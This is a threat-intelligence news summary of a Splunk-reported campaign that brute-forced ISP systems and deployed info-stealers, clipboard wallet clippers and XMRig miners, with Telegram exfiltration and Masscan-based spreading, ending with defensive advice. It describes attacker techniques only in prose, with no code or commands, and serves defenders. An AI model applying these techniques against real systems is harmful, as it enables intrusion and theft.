A recent cybersecurity investigation by the Splunk Threat Research Team has uncovered a significant exploitation campaign targeting over 4,000 IP addresses associated with Internet Service Providers (ISPs) on the West Coast of the United States and in China. This campaign involves the deployment of information-stealing malware and cryptocurrency miners on compromised systems.
Attack Methodology
The threat actors initiated their attacks by conducting brute-force attempts to exploit weak credentials, primarily originating from IP addresses linked to Eastern Europe. Upon gaining initial access, they employed PowerShell scripts to deliver various executables designed for network scanning, data theft, and cryptocurrency mining using XMRig. Notably, before executing these payloads, the attackers disabled security features and terminated services that could detect cryptominers, aiming to evade detection.
Capabilities of the Malware
The deployed stealer malware possesses functionalities beyond standard data theft. It can capture screenshots and operates similarly to clipper malware by monitoring clipboard content for cryptocurrency wallet addresses, specifically targeting Bitcoin (BTC), Ethereum (ETH), Binance Chain BEP2 (ETHBEP2), Litecoin (LTC), and TRON (TRX). The stolen information is then exfiltrated to a Telegram bot controlled by the attackers.
Tools and Persistence Mechanisms
To maintain persistence and expand their reach within compromised networks, the attackers utilized additional tools:
-
Auto.exe: Downloads a password list (
pass.txt) and a list of IP addresses (ip.txt) from the command-and-control (C2) server to facilitate further brute-force attacks. -
Masscan.exe: Employs the Masscan tool, enabling the scanning of large numbers of IP addresses to identify open ports and conduct credential brute-force attacks.
These tools allowed the threat actors to systematically target specific CIDR blocks of ISP infrastructure, enhancing their ability to compromise additional systems.
Recommendations for ISPs and Organizations
In light of this sophisticated exploitation campaign, ISPs and organizations are advised to implement the following security measures:
-
Enforce Strong Authentication: Implement robust password policies and consider multi-factor authentication (MFA) to mitigate the risk of brute-force attacks exploiting weak credentials.
-
Regular Security Audits: Conduct frequent security assessments to identify and remediate vulnerabilities within network infrastructures.
-
Monitor for Unauthorized Tools: Deploy security solutions capable of detecting the use of unauthorized tools, such as Masscan, within your network environment.
-
Restrict PowerShell Usage: Limit the use of scripting languages like PowerShell to trusted administrators and employ logging to monitor for suspicious activities.
-
Stay Informed: Keep abreast of the latest threat intelligence to understand emerging tactics, techniques, and procedures (TTPs) used by adversaries.cisa.gov